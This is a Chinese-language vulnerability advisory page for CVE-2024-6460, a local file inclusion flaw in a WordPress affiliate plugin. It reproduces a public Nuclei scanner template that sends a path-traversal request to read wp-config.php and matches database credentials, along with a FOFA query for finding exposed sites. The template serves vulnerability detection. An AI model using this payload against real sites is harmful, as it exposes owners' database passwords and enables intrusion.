CVE-2024-6460: WordPress Grow by Tradedoubler Plugin < 2.0.22 - Unauthenticated Local File Inclusion

日期: 2025-08-01 | 影响软件: WordPress Grow by Tradedoubler Plugin | POC: 已公开

漏洞描述

The Grow by Tradedoubler WordPress plugin through version 2.0.21 is vulnerable to Local File Inclusion via the component parameter. This makes it possible for attackers to include and execute PHP files on the server, allowing the execution of any PHP code in those files.

PoC代码[已公开]

id: CVE-2024-6460

info:
  name: WordPress Grow by Tradedoubler Plugin < 2.0.22 - Unauthenticated Local File Inclusion
  author: ritikchaddha
  severity: critical
  description: |
    The Grow by Tradedoubler WordPress plugin through version 2.0.21 is vulnerable to Local File Inclusion via the component parameter. This makes it possible for attackers to include and execute PHP files on the server, allowing the execution of any PHP code in those files.
  impact: |
    Unauthenticated attackers can exploit local file inclusion to read sensitive files like wp-config.php and potentially execute arbitrary PHP code.
  remediation: |
    Update Grow by Tradedoubler plugin to version 2.0.22 or later to address the local file inclusion vulnerability.
  reference:
    - https://wpscan.com/vulnerability/ba2f53e0-30be-4f37-91bc-5fa151f1eee7
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6460
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-6460
    cwe-id: CWE-22
    epss-score: 0.91868
    epss-percentile: 0.99675
  metadata:
    max-request: 2
    vendor: WordPress
    product: tradedoubler-affiliate-tracker
    fofa-query: body="wp-content/plugins/tradedoubler-affiliate-tracker/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,tradedoubler-affiliate-tracker,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "tradedoubler-affiliate-tracker"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=tm_load_data&component=../../../../wp-config.php

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009fed846d882a5d19163ddf137639b204f68c80bc5181716377b49c603fb41ee002204964c88e2867edab6e0c01de5742ce552f057031a548bdebd67b2bf0248a6d4b:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-6460.yaml

相关漏洞推荐